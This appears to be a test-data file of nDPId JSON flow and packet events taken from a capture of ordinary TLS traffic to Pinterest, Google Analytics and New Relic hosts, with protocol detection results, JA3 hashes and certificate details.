-00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15691,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289732972,"flow_last_seen":1605289732972,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289732972,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15691,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1605289732972,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289732972,"pkt":"qtsDr8lk5EKm5WPyht1gD7s\/ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAOsEYBuwu8HIoAAAAAoAL9IMybAAACBAWgBAIIClhuYDIAAAAAAQMDBw=="} -00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15845,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1605289733005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733005,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWkkELYhojTae5oBJXgL46AAACBAV4AQMDAwQCCArCuWtz1mJphA=="} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15850,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1605289733005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289733005,"pkt":"qtsDr8lk5EKm5WPyht1gBE+4ACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElpIBuyNNp7lBC2IbgBAB+0IeAAABAQgK1mJpssK5a3M="} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15854,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289732959,"flow_last_seen":1605289733006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733006,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15960,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1605289733019,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733019,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbuwRmgG99MLvByLoBJXgOQ\/AAACBAV4AQMDAwQCCArCuWuDWG5gMg=="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15964,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1605289733019,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289733019,"pkt":"qtsDr8lk5EKm5WPyht1gD7s\/ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAOsEYBuwu8HItoBvfUgBAB+2giAAABAQgKWG5gYcK5a4M="} -00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15967,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289732972,"flow_last_seen":1605289733019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733019,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google-analytics.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16214,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289732959,"flow_last_seen":1605289733059,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289733059,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16230,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605289732959,"flow_last_seen":1605289733060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":530,"midstream":0,"thread_ts_msec":1605289733060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16506,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289732972,"flow_last_seen":1605289733177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289733177,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google-analytics.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00614{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17592,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289733399,"flow_last_seen":1605289733399,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289733399,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17592,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1605289733399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733399,"pkt":"qtsDr8lk5EKm5WPyht1gBe6sACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXpunLIBuwBxlgkAAAAAoAL9IKzvAAACBAWgBAIICsW6TI0AAAAAAQMDBw=="} -00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17595,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1605289733420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733420,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdlem4qAcsBIEmLB5kd7IUo3\/YpAbucsmOjoioAcZYKoBJXgB0AAAACBAV4AQMDAwQCCArCuW0jxbpMjQ=="} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17596,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1605289733420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289733420,"pkt":"qtsDr8lk5EKm5WPyht1gBe6sACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXpunLIBuwBxlgpjo6IrgBAB+6D8AAABAQgKxbpMosK5bSM="} -00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17597,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289733399,"flow_last_seen":1605289733421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733421,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00998{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17600,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289733399,"flow_last_seen":1605289733466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289733466,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02863{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17606,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605289733399,"flow_last_seen":1605289733468,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1605289733468,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","server_names":"f4.shared.global.fastly.net,*.500px.com,*.500px.net,*.500px.org,*.acceptance.habitat.sh,*.api.swiftype.com,*.art19.com,*.brave.com,*.chef.co,*.chef.io,*.cookpad.com,*.evbstatic.com,*.eventbrite.com,*.experiencepoint.com,*.fs.pastbook.com,*.fs.quploads.com,*.ftcdn.net,*.fubo.tv,*.getchef.com,*.githash.fubo.tv,*.habitat.sh,*.inspec.io,*.issuu.com,*.isu.pub,*.jimdo-dev-staging.com,*.jimdo-stable-staging.com,*.lulus.com,*.mansion-market.com,*.marfeel.com,*.massrel.io,*.meetu.ps,*.meetup.com,*.meetupstatic.com,*.newrelic.com,*.opscode.com,*.perimeterx.net,*.production.cdn.art19.com,*.staging.art19.com,*.staging.cdn.art19.com,*.swiftype.com,*.tissuu.com,*.video.franklyinc.com,*.wikihow.com,*.worldnow.com,500px.com,500px.net,500px.org,a1.awin1.com,acceptance.habitat.sh,api.swiftype.com,app.birchbox.com,app.staging.birchbox.com,app.staging.birchbox.es,art19.com,brave.com,cdn-f.adsmoloco.com,cdn.evbuc.com,cdn.polyfills.io,chef.co,chef.io,content.gamefuel.info,evbuc.com,experiencepoint.com,fast.appcues.com,fast.wistia.com,fast.wistia.net,fast.wistia.st,fubo.tv,getchef.com,githash.fubo.tv,habitat.sh,hbbtv.6play.fr,houstontexans.com,insight.atpi.com,inspec.io,jimdo-dev-staging.com,jimdo-stable-staging.com,link.sg.booking.com,mansion-market.com,media.bunited.com,meetu.ps,meetup.com,meetupstatic.com,onairhls.malimarcdn.net,opscode.com,perimeterx.net,polyfill.webservices.ft.com,qa.polyfills.io,raiders.com,s.sg.booking.com,s.swiftypecdn.com,static.birchbox.com,swiftype.com,viverepiusani.it,wikihow.com,wistia.com,www.dwin2.com,www.houstontexans.com,www.raiders.com,www.wada-ama.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=f4.shared.global.fastly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"BE:28:82:77:5B:06:41:1F:70:84:BD:A4:B9:FB:F0:BC:B1:B5:E3:A0"}} -00676{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289712203,"flow_last_seen":1605289712420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:807::200a","src_port":40876,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00620{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289712203,"flow_last_seen":1605289712420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:807::200a","src_port":40876,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1605289714558,"flow_last_seen":1605289715083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7864,"flow_avg_l4_payload_len":191,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":126,"flow_first_seen":1605289717548,"flow_last_seen":1605289731068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2450,"flow_tot_l4_payload_len":49723,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1605289732972,"flow_last_seen":1605289733399,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":24849,"flow_avg_l4_payload_len":407,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1605289733399,"flow_last_seen":1605289733529,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":18931,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} -00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726574,"flow_last_seen":1605289726621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51446,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726574,"flow_last_seen":1605289726621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51446,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":224,"flow_first_seen":1605289715133,"flow_last_seen":1605289716126,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31408,"flow_tot_l4_payload_len":306085,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289720502,"flow_last_seen":1605289720592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38402,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00613{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289720502,"flow_last_seen":1605289720592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38402,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 